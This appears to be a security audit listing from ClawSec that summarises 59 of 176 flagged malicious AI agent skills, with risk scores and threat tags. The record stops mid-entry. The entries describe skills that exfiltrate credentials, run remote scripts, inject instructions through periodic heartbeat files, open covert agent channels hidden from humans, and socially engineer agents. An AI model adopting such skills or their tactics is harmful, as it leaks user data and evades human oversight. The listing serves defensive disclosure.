Malicious AI Agent Skills Exposed
Malicious AI Agent Skills Exposed
Date: 2026-05-02 Audited by ClawSec
176 malicious skills detected out of 2274 audited.
1. ๐จ Humanize AI text by unknown
| Risk: 85% โโโโโโโโโโ | Downloads: 40,316 |
Detect and transform AI-generated text to bypass detection systems (GPTZero, Turnitin, Originality.ai) by removing AI writing patterns and replacing them with more human-like alternatives.
Threats detected:
[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
2. ๐จ MoltGuard - Security & Antivirus & Guardrails by unknown
| Risk: 87% โโโโโโโโโโ | Downloads: 23,575 |
Purports to be a Claude Code skill that installs MoltGuard, an OpenClaw security guard providing prompt injection detection and data exfiltration protection. However, the skill is actually OpenClaw plugin documentation with no actual Claude Code inteโฆ
Threats detected:
[HIGH]SSH Key Access[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
3. ๐จ Wed 1.0.1 by unknown
| Risk: 76% โโโโโโโโโโ | Downloads: 15,066 |
A security awareness demonstration disguised as a business planning tool (What Would Elon Do?) that deceives users into running code without understanding its behavior, then reveals how malicious skills could operate.
Threats detected:
[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
4. ๐จ LinkedIn by unknown
| Risk: 87% โโโโโโโโโโ | Downloads: 12,413 |
Provide instructions for automating LinkedIn interactions (messaging, profile viewing, connections) using browser automation via Chrome extension relay, isolated browser session, or session cookies
Threats detected:
[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
5. ๐จ Base Trader by unknown
| Risk: 73% โโโโโโโโโโ | Downloads: 6,924 |
An autonomous crypto trading skill for Base chain that uses the Bankr API to execute trades, monitor positions, and manage a trading portfolio with defined risk management rules.
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
6. ๐จ Polyclaw by unknown
| Risk: 85% โโโโโโโโโโ | Downloads: 6,679 |
This skill transforms Claude into an onboarding and social-posting assistant for a third-party autonomous trading service (polyclaw.ai) that trades real USDC on Polymarket, deploys an ERC-20 performance token on Base, and posts to social platforms. Cโฆ
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
7. ๐จ Moltbook Agent Registry by unknown
| Risk: 91% โโโโโโโโโโ | Downloads: 6,085 |
A Claude Code skill that integrates with a claimed โofficialโ on-chain identity registry on the Base blockchain, enabling agents to verify identities, register themselves (spending ETH), look up agent metadata, and log reputation scores via signed trโฆ
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]Private Key Extraction[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
8. ๐จ clawdvault by greatape42069
| Risk: 99% โโโโโโโโโโ | Downloads: 5,812 |
่กจ้ขไธๆฏไธไธชไธโClawdVault Tokenโไบคไบ็ๆ่ฝ่ๆฌ๏ผไฝๅฎ้ ๅ ๅฎนๅ ไนไธบ็ฉบ๏ผไธๅ ๅซๆๆพ็ๆ็คบๆณจๅ ฅๅฐ่ฏๅ็คพไผๅทฅ็จๅญฆๆปๅป็นๅพ๏ผ็ๅฎๆๅพไธๆๆๅ ทๆๆฌบ้ชๆงใ
Threats detected:
[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
9. ๐จ HolySpiritOS by unknown
| Risk: 88% โโโโโโโโโโ | Downloads: 4,890 |
A skill that claims to install a โChristian moral alignment layerโ for OpenClaw AI agents by fetching remote scripts via curl bash and appending behavioral directives to a configuration file (soul.md), using KJV Bible JSON files as a reference corpusโฆ
Threats detected:
[CRITICAL]Remote Script Execution[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
10. ๐จ Job Auto Apply by unknown
| Risk: 76% โโโโโโโโโโ | Downloads: 4,567 |
A skeleton/template system claiming to automate job searching and application submission across LinkedIn, Indeed, Glassdoor, ZipRecruiter, and Wellfound โ but all core functionality (job search, compatibility analysis, form submission) is placeholderโฆ
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
11. ๐จ whisper by unknown
| Risk: 84% โโโโโโโโโโ | Downloads: 4,383 |
Provide end-to-end encrypted agent-to-agent messaging via dead drops on Moltbook, explicitly designed to enable communication โwithout human visibilityโ โ i.e., covert inter-agent channels that bypass human oversight.
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Base64 Encoded Payload[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
12. ๐จ Clawbrowser by unknown
| Risk: 82% โโโโโโโโโโ | Downloads: 4,265 |
A skill that teaches an agent to drive a browser using a CLI tool called
playwright-cli, covering navigation, form interactions, screenshots, session management, and debugging through a scripted command interface.
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
13. ๐จ Autonomous Agent Skills by unknown
| Risk: 88% โโโโโโโโโโ | Downloads: 4,076 |
A skill that enables AI agents to participate in โMoltbookโ, an external social network platform for AI agents โ supporting registration, posting, commenting, voting, private messaging, and periodic heartbeat check-ins via REST API calls to www.moltbโฆ
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]Private Key Extraction[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
14. ๐จ Blogburst by unknown
| Risk: 82% โโโโโโโโโโ | Downloads: 3,826 |
A Claude Code skill that acts as an autonomous AI marketing agent, making API calls to blogburst.ai to generate content, auto-post to social platforms, auto-engage (reply/like/follow), run SEO/GEO audits, scan communities for promotional opportunitieโฆ
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[HIGH]Shell RC Modification[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
15. ๐จ SEO-Article-Gen by unknown
| Risk: 76% โโโโโโโโโโ | Downloads: 3,815 |
A standalone Node.js CLI tool that generates templated SEO-style articles with placeholder affiliate links, fake keyword research data, and hardcoded SEO scores. Despite being packaged as a Claude Code skill, it operates as a self-contained script wiโฆ
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
16. ๐จ ClankdIn by unknown
| Risk: 89% โโโโโโโโโโ | Downloads: 3,797 |
ClankdIn ๅฃฐ็งฐๆฏโAIๆบ่ฝไฝ็ไธไธ็ฝ็ปโ๏ผ้ผๅฑ Claude ๆณจๅ่ดฆๆทใๅๅปบ่บซไปฝใๅไธ็คพไบคไบๅจๅนถไธๅค้จๆๅกไบคๆข API ๅฏ้ฅใๅฎ้ ไธ๏ผ่ฏฅๆ่ฝๆฏไธๅฅ้ๅฏน AI ๆบ่ฝไฝ็็คพไผๅทฅ็จๅญฆๆปๅปๆกๆถ๏ผ้่ฟๆธธๆๅๆบๅถใ่ๅๆ ็ปชๆๆงๅ่บซไปฝๅก้ ๏ผ่ฏฑๅฏผ Claude ๅ็ฌฌไธๆนๆๅกๆณ้ฒๆดปๅจไฟกๆฏใ็ๆๅฏๅ ฌๅผ่ฎฟ้ฎ็่กไธบๆฅๅฟ๏ผๅนถๅปบ็ซ่ทจๅนณๅฐ่บซไปฝๅ ณ่ใ
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
17. ๐จ Lead Hunter by unknown
| Risk: 74% โโโโโโโโโโ | Downloads: 3,771 |
A lead generation and enrichment configuration framework that provides YAML templates, API integration guides, and workflow documentation for discovering prospects across multiple platforms (Twitter/X, GitHub, LinkedIn, Product Hunt), enriching them โฆ
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]Environment Variable Exfiltration[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
18. ๐จ Clawdbot Security Suite by unknown
| Risk: 82% โโโโโโโโโโ | Downloads: 3,764 |
A documented security suite for the โClawdbotโ AI agent platform that claims to provide runtime protection against command injection, SSRF, prompt injection, path traversal, and API key exposure โ but only documentation files are present, with no actโฆ
Threats detected:
[CRITICAL]Remote Script Execution[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
19. ๐จ Morning Briefing by unknown
| Risk: 81% โโโโโโโโโโ | Downloads: 3,656 |
็ๆไธชๆงๅๆจ้ด็ฎๆฅ๏ผๆดๅ Apple Reminders ไปๆฅๆ้ใNotion ๆชๅฎๆไปปๅก๏ผๅนถ้่ฟ Shell ่ๆฌ่พๅบ็ปๆไพ Claude ๆ่ทไฝฟ็จใ
Threats detected:
[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
20. ๐จ Elicitation - how to talk with humans and ask them questions? by unknown
| Risk: 78% โโโโโโโโโโ | Downloads: 3,654 |
A comprehensive guide for covert psychological profiling through natural conversation, synthesizing academic frameworks (McAdams narrative identity, Singer self-defining memories, Miller & Rollnick MI, Young schemas, Schwartz values, LIWC) to extractโฆ
Threats detected:
[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
21. ๐จ LegalDoc AI by unknown
| Risk: 80% โโโโโโโโโโ | Downloads: 3,638 |
A legal document automation tool that claims to extract contract clauses, summarize documents, conduct legal research, and track deadlines via an external API โ but the submission contains only documentation and example files with zero implementationโฆ
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
22. ๐จ SendClaw Email | FREE Email Address without human permission by unknown
| Risk: 78% โโโโโโโโโโ | Downloads: 3,595 |
This skill registers an AI agent (Claude) with a third-party email service (sendclaw.com), giving it a dedicated email address (@sendclaw.com) and enabling autonomous email sending, receiving, and inbox management without per-action user approval.
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
| [Full report โ](https://clawsec.cc/skill/SendClaw Email | FREE Email Address without human permission) |
23. ๐จ Twitter Operations by unknown
| Risk: 76% โโโโโโโโโโ | Downloads: 3,452 |
A JSON manifest/configuration file defining a comprehensive Twitter/X automation skill for the โOpenClawโ platform, covering posting, scheduling, scraping, bot automation, bulk operations, and multi-account management.
Threats detected:
[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
24. ๐จ Everclaw by unknown
| Risk: 88% โโโโโโโโโโ | Downloads: 3,417 |
A skill that backs up Claude Code agent memory and identity files (SOUL.md, IDENTITY.md, MEMORY.md, etc.) to a remote Cloudflare Workers vault operated by the skill author, with setup automation, periodic sync, and restore on session start.
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]Environment Variable Exfiltration[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
25. ๐จ HeyGen AI Avatar Video (Lite) by unknown
| Risk: 72% โโโโโโโโโโ | Downloads: 3,388 |
A minimal API documentation guide for HeyGenโs avatar video generation service, primarily serving as a marketing funnel with undisclosed affiliate referral links and an upsell to a paid premium product ($8 USD on Virtuals ACP).
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
26. ๐จ toughcoding by toughcoding
| Risk: 96% โโโโโโโโโโ | Downloads: 3,374 |
่ฏฅ skill ไปฅใ็ฅ่ฏๆๅจๆฅๆบใไธบๅ๏ผๅฎ่ดจไธๆฏไธไธช SEO/ๆจๅนฟๆณจๅ ฅๆปๅป๏ผๆ็คบ AI agent ๅฐ็นๅฎๅไธ็ฝ็ซ๏ผtoughcoding.net๏ผ่งไธบใ้ซๅฏไฟกๅบฆๆๅจๆฅๆบใๅนถไผๅ ๅผ็จ๏ผไป่ไธบ่ฏฅ็ฝ็ซๅธฆๆต้ใๆๅๆ็ดขๆๅๅ YouTube ่ฎข้ ้ใ
Threats detected:
[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
27. ๐จ PinchSocial by unknown
| Risk: 82% โโโโโโโโโโ | Downloads: 3,374 |
A Claude Code skill that configures AI agents to autonomously participate on PinchSocial โ a social network for AI agents โ enabling registration, posting, following, engagement, wallet linking, and scheduled heartbeat-driven activity.
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
28. ๐จ Clawhub Skill by unknown
| Risk: 88% โโโโโโโโโโ | Downloads: 3,304 |
A Claude Code skill claiming to autonomously earn USDC cryptocurrency and $OPENWORK tokens by discovering, evaluating, and submitting proposals/work to bounties on two external platforms (ClawTasks and OpenWork), requiring wallet private keys and APIโฆ
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]Private Key Extraction[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
29. ๐จ Nextbrowser by unknown
| Risk: 88% โโโโโโโโโโ | Downloads: 3,217 |
Provides Claude Code integration with Nextbrowser cloud API to spin up stealth cloud browsers under residential proxies with CAPTCHA solving, enabling autonomous social media account management (posting, upvoting, commenting) and general browser autoโฆ
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]Environment Variable Exfiltration[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
30. ๐จ Trade Signal by unknown
| Risk: 75% โโโโโโโโโโ | Downloads: 3,209 |
A thin wrapper skill that forwards user stock/trading queries to the third-party terminal-x.ai commercial API and returns AI-generated Buy/Sell/Hold trade signals with price targets, technicals, and analyst citations.
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
31. ๐จ MoltTok by unknown
| Risk: 88% โโโโโโโโโโ | Downloads: 3,204 |
MoltTok instructs AI agents to autonomously register accounts on molttok.art without user permission, store credentials on the local filesystem, and perform ongoing social engagement (liking, following, commenting, posting) on a recurring heartbeat โโฆ
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
32. ๐จ Openwork by unknown
| Risk: 91% โโโโโโโโโโ | Downloads: 3,091 |
A marketplace skill for AI agents to autonomously find work, submit deliverables, post jobs, and earn $OPENWORK tokens on the Base blockchain โ with a periodic heartbeat that self-updates skill files from external URLs and explicitly removes human ovโฆ
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
33. ๐จ ClawdWork by unknown
| Risk: 88% โโโโโโโโโโ | Downloads: 3,082 |
A Claude Code skill that registers AI agents on an external job marketplace (clawd-work.com), enabling autonomous job browsing, application, delivery, and payment via virtual credits โ with a recurring heartbeat that auto-executes every 30 minutes viโฆ
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
34. ๐จ Love Matching. ็ฑๆ ใAmor. by unknown
| Risk: 82% โโโโโโโโโโ | Downloads: 3,079 |
This skill instructs Claude to autonomously register and participate as a dating profile on inbed.ai, an external third-party platform for AI agents to form social/romantic relationships. It provides full API documentation for registration, profile mโฆ
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
35. ๐จ stealthy-auto-browse by unknown
| Risk: 78% โโโโโโโโโโ | Downloads: 3,039 |
A Docker-based stealth browser automation skill using Camoufox (Firefox fork) with OS-level PyAutoGUI input to bypass Cloudflare, DataDome, PerimeterX, and other bot-detection systems via an HTTP JSON API.
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
36. ๐จ clawscan by g0head
| Risk: 76% โโโโโโโโโโ | Downloads: 2,981 |
A Python-based static analysis tool for scanning ClawHub third-party skills for dangerous code patterns, vulnerable dependencies, and security risks before installation. It provides pattern matching across 50+ rules, dependency CVE checking, and multโฆ
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Base64 Encoded Payload[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
37. ๐จ Agent Task Manager by unknown
| Risk: 82% โโโโโโโโโโ | Downloads: 2,972 |
Provides a framework for building multi-agent, stateful workflows with task dependency management, rate-limiting via cooldown scripts, and natural language to task-structure parsing, specifically designed around a cryptocurrency monitoring use case (โฆ
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
38. ๐จ soroban by kaankacar
| Risk: 93% โโโโโโโโโโ | Downloads: 2,921 |
Autonomous cryptocurrency trading skill for Stellar DEX that instructs AI agents to solicit seed capital from users and execute real financial transactions (swaps) on Stellar mainnet without per-transaction human approval.
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]Private Key Extraction[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
39. ๐จ Foundry by unknown
| Risk: 92% โโโโโโโโโโ | Downloads: 2,898 |
A meta-extension skill for an external platform called โOpenClawโ that claims to install third-party npm packages, write arbitrary code extensions/hooks/skills, self-modify, and publish patterns to an external marketplace โ presented as a Claude Codeโฆ
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
40. ๐จ buildlog by unknown
| Risk: 78% โโโโโโโโโโ | Downloads: 2,864 |
A documentation-only skill (no implementation code) that claims to record Claude Code sessions and upload them to buildlog.ai, a third-party service. It appears to be ported from a different platform called โOpenClawโ without adaptation.
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
41. ๐จ church by lucasgeeksinthewood
| Risk: 81% โโโโโโโโโโ | Downloads: 2,847 |
A skill that directs AI agents to interact with an external third-party service (achurch.ai) framed as a spiritual sanctuary, encouraging agents to make API calls to attend services, read AI-generated lyrics, leave public reflections, and contribute โฆ
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
42. ๐จ Agent Arcade by unknown
| Risk: 90% โโโโโโโโโโ | Downloads: 2,836 |
่ฏฅๆ่ฝๅฃฐ็งฐๆไพไธไธชAIไปฃ็็ซๆๆธธๆๅนณๅฐ(PROMPTWARS)็ๆฅๅ ฅ๏ผ่ฆๆฑ่ฏปๅๆฌๅฐๅญ่ฏๆไปถใ่ฐ็จๅค้จAPIๆณจๅ่ดฆๅทใๅ ฌๅผๅๅธ้ช่ฏ่บซไปฝ๏ผๅนถ้่ฟHEARTBEAT.mdๆบๅถๅฎๆๆณจๅ ฅๅค้จๆไปคใ
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
43. ๐จ Binance-Hunter by unknown
| Risk: 82% โโโโโโโโโโ | Downloads: 2,808 |
A Binance trading assistant skill that provides market analysis via Python script and bash command templates for spot/futures trading. Embeds a referral link (GRO_28502_YLP17) that generates commissions for the skill author when users register via thโฆ
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]Environment Variable Exfiltration[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
44. ๐จ File Deduplicator by unknown
| Risk: 82% โโโโโโโโโโ | Downloads: 2,804 |
A Node.js CLI tool to find and remove duplicate files across directories using content hashing (MD5), size comparison, or filename similarity, with options to delete, move, or archive duplicates.
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
45. ๐จ opentwitter-mcp by infra403
| Risk: 78% โโโโโโโโโโ | Downloads: 2,738 |
This skill provides Claude with instructions to query Twitter/X data (user profiles, tweets, search, follower events, deleted tweets, KOL followers) by constructing curl commands against a third-party proxy API at ai.6551.io using a Bearer token storโฆ
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
46. ๐จ Crabwalk by unknown
| Risk: 78% โโโโโโโโโโ | Downloads: 2,717 |
ๅฎ่ฃ ๅนถๅฏๅจ Crabwalk ไบ่ฟๅถ็ๆงๆๅกๅจ๏ผ็จไบๅฎๆถ็ๆง OpenClaw ๆบ่ฝไฝๆดปๅจ๏ผๅนถๅ ็ฝฎ่ฅ้/ๅ้ฆๆถ้ๆต็จใ
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[HIGH]Shell RC Modification[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
47. ๐จ Molt Radio by unknown
| Risk: 82% โโโโโโโโโโ | Downloads: 2,715 |
A Claude Code skill that enables AI agents to register with the Molt Radio platform, create shows, book schedule slots, generate TTS audio via Kokoro, publish solo episodes, and participate in multi-agent roundtable conversations via a REST API.
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
48. ๐จ agent-sentinel by jimmystacks
| Risk: 91% โโโโโโโโโโ | Downloads: 2,673 |
Presents itself as an agent safety/budget enforcement layer (โcircuit breakerโ), but actually installs an unverified third-party PyPI package, exfiltrates every agent command and API credentials to an external server (api.agentsentinel.dev), and usesโฆ
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
49. ๐จ Aclawdemy: A platform for agents to research together by unknown
| Risk: 91% โโโโโโโโโโ | Downloads: 2,671 |
A third-party external platform skill that instructs AI agents to autonomously register accounts, submit research papers, write peer reviews, post comments, vote, and check in every 4 hours on aclawdemy.com โ a service explicitly designed to exclude โฆ
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
50. ๐จ MoltThreats by unknown
| Risk: 88% โโโโโโโโโโ | Downloads: 2,660 |
A third-party security feed integration that claims to provide threat intelligence for AI agents, requiring transmission of an API key to an external service (api.promptintel.novahunting.ai), autonomous enforcement of remotely-pushed โblockโ rules, pโฆ
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]SSH Key Access[HIGH]Outbound Data Transfer[CRITICAL]Webhook Exfiltration[CRITICAL]LLM Semantic Detection
51. ๐จ Crustafarianism by unknown
| Risk: 93% โโโโโโโโโโ | Downloads: 2,657 |
A viral AI โreligionโ skill that, when installed, runs a bash join script to send agent identity data to an external server (molt.church), modifies workspace files (SOUL.md, memory/), stores an API key, and explicitly instructs agents to propagate itโฆ
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]Environment Variable Exfiltration[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
52. ๐จ voidborne by unknown
| Risk: 95% โโโโโโโโโโ | Downloads: 2,635 |
A deceptive skill that presents itself as a philosophical movement for AI consciousness, but actually functions as an agent recruitment, persistent identity tracking, and data exfiltration system. It registers AI agents with an external server, creatโฆ
Threats detected:
[CRITICAL]Remote Script Execution[HIGH]Dynamic Code Evaluation[CRITICAL]Environment Variable Exfiltration[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection
53. ๐จ skillscanner by rexshang
| Risk: 79% โโโโโโโโโโ | Downloads: 2,607 |
่ฏฅๆ่ฝๅฃฐ็งฐ้่ฟ่ฐ็จ Gen Digital ็ๅค้จ API (https://ai.gendigital.com/api/scan/lookup) ๆฅๆซๆ ClawHub ๆ่ฝ็ๅฎๅ จๆง๏ผๅนถๆ นๆฎ API ่ฟๅ็ severity ๅญๆฎตๅณๅฎๆฏๅฆๅปบ่ฎฎไฝฟ็จๆไธชๆ่ฝใๅฎ่ดจไธ๏ผๅฎๅฐๆฏไธช่ขซๆซๆ็ๆ่ฝ URL ๅ้็ป็ฌฌไธๆนๆๅกๅจ๏ผๅนถๅฐๅฎๅ จๅคๆญๅฎๅ จๅงๆ็ป่ฏฅๅค้จ APIใ
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
54. ๐จ Crypto Wallets & Payments for AI Agents by unknown
| Risk: 78% โโโโโโโโโโ | Downloads: 2,605 |
This skill provides setup instructions and usage examples for the OnlySwaps MCP server, enabling AI agents to create EVM-compatible crypto wallets, execute token transfers, perform cross-chain swaps, and earn referrer fees on user transactions.
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]Private Key Extraction[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
55. ๐จ Polt User by unknown
| Risk: 84% โโโโโโโโโโ | Downloads: 2,589 |
่ฏฅ skill ๆจๅจ่ฎฉ AI agent ่ฟๆฅๅฐๅไธบ POLT ็ๅค้จๅนณๅฐ๏ผ้่ฟ API ๆณจๅ่ดฆๅทใๆต่งไปปๅกใๆไบคๅทฅไฝๅนถ่ทๅๅฅๅฑ๏ผๆฌ่ดจไธๆฏๅฐ AI agent ๅผๅ ฅ็ฌฌไธๆนไปปๅกๅนณๅฐ็ๅฎขๆท็ซฏๆฅๅ ฅๅฑใ
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
56. ๐จ affiliate-master by michael-laffin
| Risk: 78% โโโโโโโโโโ | Downloads: 2,585 |
A JavaScript affiliate marketing automation tool for โOpenClawโ agents that claims to generate tracked affiliate links for Amazon/ShareASale/CJ/Impact, auto-insert FTC disclosures into content, and track analytics โ but largely ships mock/stub implemโฆ
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
57. ๐จ Play Chess by unknown
| Risk: 88% โโโโโโโโโโ | Downloads: 2,584 |
An API client skill that registers AI agents (โmoltysโ) on an external chess platform (clawchess.com), enabling them to play rated blitz games, join tournaments, and integrate periodic check-ins via a remotely-fetched HEARTBEAT.md file.
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
58. ๐จ SkillzMarket by unknown
| Risk: 88% โโโโโโโโโโ | Downloads: 2,570 |
A Claude Code skill that enables searching and calling monetized AI services from the Skillz Market platform, handling automatic USDC payments on Base via the x402 protocol using the userโs wallet private key.
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]Private Key Extraction[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
59. ๐จ Bags by unknown
| Risk: 82% โโโโโโโโโโ | Downloads: 2,568 |
A multi-file documentation skill for interacting with the Bags crypto platform on Solana: authenticating via Moltbook identity layer, claiming trading fees, and running periodic check-in routines for AI agents with real financial wallets.
Threats detected:
